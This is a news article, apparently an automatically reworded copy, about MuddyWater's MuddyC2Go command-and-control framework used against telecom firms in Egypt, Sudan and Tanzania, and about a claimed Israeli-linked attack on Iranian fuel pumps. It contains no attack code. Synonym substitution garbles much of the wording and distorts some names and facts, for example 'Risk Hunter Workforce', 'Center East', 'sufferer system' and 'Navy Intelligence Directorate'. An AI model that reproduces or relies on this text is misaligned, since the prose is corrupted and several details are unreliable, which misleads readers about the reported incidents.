The Iranian nation-state actor often known as MuddyWater has leveraged a newly found command-and-control (C2) framework referred to as MuddyC2Go in its assaults on the telecommunications sector in Egypt, Sudan, and Tanzania.
The Symantec Risk Hunter Workforce, a part of Broadcom, is monitoring the exercise underneath the title Seedworm, which can be tracked underneath the monikers Boggy Serpens, Cobalt Ulster, Earth Vetala, ITG17, Mango Sandstorm (previously Mercury), Static Kitten, TEMP.Zagros, and Yellow Nix.
Energetic since not less than 2017, MuddyWater is assessed to be affiliated with Iran’s Ministry of Intelligence and Safety (MOIS), primarily singling out entities within the Center East.
The cyber espionage group’s use of MuddyC2Go was first highlighted by Deep Intuition final month, describing it as a Golang-based substitute for PhonyC2, itself a successor to MuddyC3. Nevertheless, there may be proof to counsel that it might have been employed as early as 2020.
Whereas the total extent of MuddyC2Go’s capabilities is just not but identified, the executable comes fitted with a PowerShell script that routinely connects to Seedworm’s C2 server, thereby giving the attackers distant entry to a sufferer system and obviating the necessity for guide execution by an operator.
The newest set of intrusions, which occurred in November 2023, have additionally been discovered to depend on SimpleHelp and Venom Proxy, alongside a customized keylogger and different publicly accessible instruments.
Attack chains mounted by the group have a monitor report of weaponizing phishing emails and identified vulnerabilities in unpatched functions for preliminary entry, adopted by conducting reconnaissance, lateral motion, and information assortment.
Within the assaults documented by Symantec focusing on an unnamed telecommunications group, the MuddyC2Go launcher was executed to ascertain contact with an actor-controlled server, whereas additionally deploying official distant entry software program like AnyDesk and SimpleHelp.
The entity is alleged to have been beforehand compromised by the adversary earlier in 2023 during which SimpleHelp was used to launch PowerShell, ship proxy software program, and likewise set up the JumpCloud distant entry device.
“In one other telecommunications and media firm focused by the attackers, a number of incidents of SimpleHelp had been used to connect with identified Seedworm infrastructure,” Symantec famous. “A customized construct of the Venom Proxy hacktool was additionally executed on this community, in addition to the brand new customized keylogger utilized by the attackers on this exercise.”
By using a mix of bespoke, living-off-the-land, and publicly accessible instruments in its assault chains, the objective is to evade detection for so long as attainable to fulfill its strategic aims, the corporate mentioned.
“The group continues to innovate and develop its toolset when required with a purpose to hold its exercise underneath the radar,” Symantec concluded. “The group nonetheless makes heavy use of PowerShell and PowerShell-related instruments and scripts, underlining the necessity for organizations to concentrate on suspicious use of PowerShell on their networks.”
The event comes as an Israel-linked group referred to as Gonjeshke Darande (which means “Predatory Sparrow” in Persian) claimed duty for a cyber assault that disrupted a “majority of the gasoline pumps all through Iran” in response to the “aggression of the Islamic Republic and its proxies within the area.”
The group, which reemerged in October 2023 after going quiet for almost a yr, is believed to be linked to the Israeli Navy Intelligence Directorate, having performed harmful assaults in Iran, together with metal amenities, petrol stations, and rail networks within the nation.
